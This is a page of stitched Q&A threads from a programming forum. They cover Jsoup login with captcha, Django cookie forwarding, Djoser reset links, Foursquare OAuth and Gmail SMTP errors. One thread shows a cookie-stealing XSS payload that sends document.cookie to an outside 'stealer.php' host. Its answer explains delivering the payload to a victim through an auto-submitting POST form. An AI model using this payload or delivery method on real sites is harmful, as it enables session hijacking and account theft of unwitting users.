I have been trying to develop a small application that gets captcha from my academics page, displays it to the user, the user enters captcha and the program should display details. However, I am stuck at login page itself. I used jsoup to get the cookie,save captcha to a folder, submit captcha along with form data, using the previous cookie. But I get the same login page again. Please help!
This is the get request. Website url https://academics.vit.ac.in/parent/parent_login.asp
Response res = Jsoup.connect(webSiteURL).method(Method.GET).execute();
Map<String,String> cook = res.cookies();
String sessionid = res.cookie("ASPSESSIONIDSQHDAQRQ");
After getting the captcha, this is the post request.
Response login = Jsoup.connect(webSiteURL)
.userAgent("Mozilla/5.0")
.cookie("ASPSESSIONIDSQHDAQRQ", sessionid).
data("message","Enter Verification Code of 6 characters exactly as shown.")
.data("vrfcd",captcha).data("wdpswd","somedata").data("wdregno","somedata")
.method(Method.POST).execute();
System.out.println(login.parse());
When I tried this
System.out.println(login.cookies());
The value is null, is that a clue?? Help me out!! Thanks!!
Are you sure you are retrieving the captcha using the cookie too?. Please check that. I mean, you can download the captcha with something like:
Response res1 = Jsoup.connect("https://academics.vit.ac.in/parent/captcha.asp")
.cookie("ASPSESSIONIDSQHDAQRQ", sessionid)
.ignoreContentType(true)
.method(Method.GET).timeout(30000).execute();
Then be sure that in the login post you are using the correct url, that is:
https://academics.vit.ac.in/parent/parent_login_submit.asp
Then it should work fine.
Hope it helps.
Related
I have a django app with an endpoint that kicks off a long running task. I want to do this in the background. I know I could do this with celery or django-q, but I wanted to try something simpler first.
First thing I tried was ajax. In the python code I did this:
cookie = request.META.get('HTTP_COOKIE')
csrf_cookie = request.META.get('CSRF_COOKIE')
host = '{}://{}'.format(request.scheme, request.META['HTTP_HOST'])
data = {...}
resp = requests.post('{}/report/TASKS/Work/ajax/run.json'.format(host),
headers={'COOKIE': cookie, 'X-CSRFToken': csrf_cookie, 'referer': host}, data=data)
The function being called has the #login_required decorator, and when that runs it does the auth as the anonymous user, which fails so it redirects to the login page. The thread sending in the request is logged in and I have verified the cookies are all correct. Why would it use the anonymous user? How can I get it to auth using the logged in user?
Tried something else next - instead of using ajax I call it with multiprocessing.Process. This fails because the thread does not have a database connection.
Anyone have any thought on how I could make this work?
I am attempting to create Reset Password functionality using Djoser. I am successfully hitting my API's auth/users/reset_password/ endpoint, which is then sending an email as expected. But the problem is occurring in the content of the email. It is sending a redirection link to my api, rather than to my frontend.
Please note, any <> is simply hiding a variable and is not actually displayed like that
Here is an example of what the email looks like:
You're receiving this email because you requested a password reset for your user account at <api>.
Please go to the following page and choose a new password: <api>/reset-password/confirm/<uid>/<token>
Your username, in case you've forgotten: <username>
Thanks for using our site!
The <api> team
The goal with this email is to send the user to the /reset-password/confirm/ url on my frontend, not on my api, which is currently occurring.
Here are my DJOSER settings:
DJOSER = {
'DOMAIN': '<frontend>',
'SITE_NAME': '<site-name>',
'PASSWORD_RESET_CONFIRM_URL': 'reset-password/confirm/{uid}/{token}',
}
The expected behavior is for the DOMAIN setting to alter the link that is being placed in the email, but it is not. I can't seem to find reference to this particular problem within the docs.
Any help here would be greatly appreciated, thanks.
I figured it out:
Due to Djoser extending the package django-templated-mail, the variables DOMAIN and SITE_NAME have to override django-templated-mail setting rather than Djoser's setting. So, you have to pull variables specific to django-templated-mail out of the Djoser variable.
The working setup actually looks like:
DOMAIN = '<frontend>',
SITE_NAME = '<site-name>',
DJOSER = {
'PASSWORD_RESET_CONFIRM_URL': 'reset-password/confirm/{uid}/{token}',
}
I have a problem here,, i have xss vuln website on "search bar" . on the search bar can occurs xss and i can store my own cookie to my other site using this:
hello new Image().src = "https:// site /stealer.php?cookie=" + document.cookie;
nah, how i can send the url like http:// site (.) com/search to my victim if there's no payload on url (because it uses post method) and on the page doen't show any post that can lead to XSS
or if there's another impact please explaon to me
thank you
You send them a URL to your website which in turn auto submits a form with the needed POST request to the website in question.
I getting back into Python and wanted to use the pyfoursquare package to access the Foursquare API. I'm trying to get information about venues using the venues method in the API class. I'm primarily trying to find out whether a venue page is verified with Foursquare or not. When I provide my client id, client secret, and venue id I keep getting back an error that states "Authentication required", which doesn't makes sense because I'm providing that information. Any help would be great. Thank you.
import pyfoursquare as foursquare
client_id = ""
client_secret = ""
callback = ""
auth = foursquare.OAuthHandler(client_id, client_secret, callback)
api = foursquare.API(auth)
result = api.venues("4e011a3e62843b639cfa9449")
print result[0].name
Let me know if you would like to see the error message. Thanks again.
I believe you are skipping the step of grabbing your OAuth2 access token, so you're not technically authenticated.
Have a look at the following instructions, under "How to Use It":
https://github.com/marcelcaraciolo/foursquare
The lines that might be useful to you are:
#First Redirect the user who wish to authenticate to.
#It will be create the authorization url for your app
auth_url = auth.get_authorization_url()
print 'Please authorize: ' + auth_url
#If the user accepts, it will be redirected back
#to your registered REDIRECT_URI.
#It will give you a code as
#https://YOUR_REGISTERED_REDIRECT_URI/?code=CODE
code = raw_input('The code: ').strip()
#Now your server will make a request for
#the access token. You can save this
#for future access for your app for this user
access_token = auth.get_access_token(code)
print 'Your access token is ' + access_token
I have this function in forms.py. There is currently no email specifications in my settings.py.
def send_email(FROM_NAME,FROM,TO,SUB,MSG,EXISTING_EMAIL,EXISTING_PASSWORD):
FROMADDR = "%s <%s>" % (FROM_NAME, FROM)
LOGIN = EXISTING_EMAIL
PASSWORD = EXISTING_PASSWORD
TOADDRS = [TO]
SUBJECT = SUB
msg = ("From: %s\r\nTo: %s\r\nSubject: %s\r\n\r\n" % (FROMADDR, ", ".join(TOADDRS), SUBJECT) )
msg += MSG+"\r\n"
server = smtplib.SMTP('smtp.gmail.com', 587)
server.set_debuglevel(1)
server.ehlo()
server.starttls()
server.login(LOGIN, PASSWORD)
server.sendmail(FROMADDR, TOADDRS, msg)
server.quit()
I call it my views.py like so
send_email('my_name','from_me#gmail.com','to_som1#gmail.com','my subject','mymessage','my_existing_email#gmail.com','password_to_existing_email')
This works locally. I have tested it with yahoomail and gmail. But when I upload to heroku it gives the error "(535, '5.7.1 Please log in with your web browser and then try again. Learn more at\n5.7.1 support.google.com/mail/bin/answer.py?answer=78754 et6sm2577249qab.8')"
Can anyone help?
You want to use this:
FROMADDR = "%s <%s>" % (your_name, your_email)
You shouldn't be building emails with string interpolation, that's a good way to get your site used to send spam via header injections. See my answer here for details on how to construct emails securely.
Generally speaking, when formatting from addresses, you should use the format Display Name <email#example.com>. See RFC 5322 for details.
Have you read the page linked to in the error message?
If you're repeatedly prompted for your username and password, or if
you're getting an 'invalid credentials' or 'web login required' error,
make sure your password is correct. Keep in mind that password are
case-sensitive.
If you’re sure your password is correct, sign in to your account from
the web version of Gmail instead at http://mail.google.com
In most cases signing in from the web should resolve the issue
Here is what worked for me. After getting the error Please log in with your web browser and then try again. Learn more etc. when trying to send email from my web application, I logged in to the email via browser from my local computer.
After I logged in, there was a yellow notification bar on top which asking me if I want to allow external application access my mail. I confirmed this and Google asked me to log in to the account from the application within the next 10 mins. This will white-list the application.